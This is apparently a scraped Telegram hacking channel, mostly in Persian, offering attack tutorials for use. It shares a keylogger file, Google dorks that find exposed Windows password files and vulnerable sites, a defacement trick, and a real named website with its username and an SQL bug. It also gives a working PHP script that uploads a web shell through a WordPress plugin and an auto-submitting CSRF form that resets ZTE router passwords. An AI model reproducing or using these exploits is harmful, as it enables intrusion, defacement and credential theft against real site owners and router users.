0Day.Today | Learn Exploit | Zero World | Dark web |
19.1K subscribers
1.23K photos
127 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
کیلاگر ضبط کننده ی کلید ها!
دوستان این کد priv8 بوده و از darkweb برداشته شده .
❤‍🔥1
trojan.cpp
2.2 KB
کیلاگر ضبط کننده ی کلید ها!
اموزش نوشتن #کرکر وردپرس
#WP #Cracker by #Evil_Boy
@LearnExploit
0Day.Today (Tele)
http://izkalite.gov.tr/portal/hata.php?mesaj=


میبیند که میتونید تگ های Html خودتون رو جلوی = بذارید و صفحه تغییر پیدا کنه
هکر ها یا کلاه برداران اینترنتی از این ها جهت فریب تارگت هاشون استفاده
اموزش بدست اوردن
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
-----
@LearnExploit
اموزش بدست اوردن
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
------
شاید اول از هر چیزی بپرسید که SAM چیه ؟
دوستان SAM با همون
Security Account Manager
است که user and pass ویندوز رو درون خودش نگهداری میکنه !
فایل SAM ساختار ساده ای داره و از دو نوع الگوریتم Hashing به نام های LM (یه یک الگریتم ضعیف بوده) و NTLM (که یک الگریتم جدید و بهبود یافته است) .
شما میتونید فایل SAM ویندوز خودتون رو از مسیر زیر بدست بیارید :
%SystemRoot%/system32/config/SAM
(در مورد Dump این فاید بعدا صحبت میکنیم).
_
حالا روش بدست اوردن این فایل از طریق وب :
Dork : filetype:txt Administrator:500:
و تمام :)
نمونه :
https://www.albany.edu/~goel/classes/spring2010/itm604/pwfile.txt
=====================
#X0P4SH4
T.me/LearnExploit
0Day.Today
نحوه ی هک (دیفیس) سایت توسط باگ Url Posting
#Url_Posting #Bug #Deface
-------------------------------
همان طور که از اسم سایت پیداست شما میتونید با استفاده از این باگ و به وسیله ی URL در سایت تغییراتی ایجاد کنید.
دورک مورد استفاده دراین باگ :

<Start ~ Dorks >

| site:ua "j images jdownloads screenshots version php j"
| site:ua "wp content uploads gravity forms index php option com jdownloads"
| site:ua "plugins editors jce tiny mce plugins cfg contactform"
| site:ua "cfg contactform"

<end ~ Dorks>
~~~~~~~~~~~~~~
POC ~ Exploiting :
just change Url of site ::::

http[s]://Example.me/HACKED-BY-X0P4SH4
:)
#X0P4SH4
t.me/LearnExploit
0Day.Today
#TarGet
~ :
http://www.janinedrayson.co.uk/

#User
~ :
Janinedr

#Pass
~:
Find By self :)

#Bug
~:
Sql
~~~~~~~~~~~~
Have Nice day !
I'm X0P4SH4

there [0Day.Today] Of telegram
ID : @LearnExploit
#WP(Wordpress) #Hacking #Plugin (Peugeot-Music-Plugin) #Exploit
-------------~______~---------

#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"

#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"

#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here

$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.

#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php

========================
#GOODNIGHT
#X0P4SH4

T.me/LearnExploit
0Day.Today
👍1
اموزش نحوه ی #اکسپلویت #روتر های TeDate-ZTE
How to #Exploit #TeDate_ZTE #Rauter's
---> ~# @LearnExploit
---------
title :
( #TeDate_ZTE #Exploiting )

#Url_Patch
~#
/forms/tools_admin_1/

#Exploit
~#
<html>
<body onload="document.alqnas.submit()">

<form action="http://192.168.1.1/Forms/tools_admin_1" method="post" name="alqnas"> //Put Here Ur Rauter IP

<input type="hidden" name="uiViewTools_Password" value="new pass" />

<input type="hidden" name="uiViewTools_PasswordConfirm" value="new pass" />

</form>
</body>
</html>

#Explanations
~#
این باگ از نوع CSRF بوده و در این اکسپلویت درخواست تغییر یوزرنیم و پسورد رو میده
روش اجرا :
موارد زیر رو به نفع خودتون تغییر بدید 😄 :
name="Ur New Username "
value="Ur New Pass"
value="config Ur New Pass"

سپس اکسپلویت رو با پسوند .html سیو کرده
و اجرا کنید :)
روتر یوزر و پسورد جدید رو دریافت کرده :)
================
#X0P4SH4
-->Router Hacking
@LearnExploit ~ 0Day.Today
👍1
اموزش کامل کار با ابزار قدرتمند WPSCAN
#Wpscan (Wordpress Scan) #Learning recorded by #armia_evil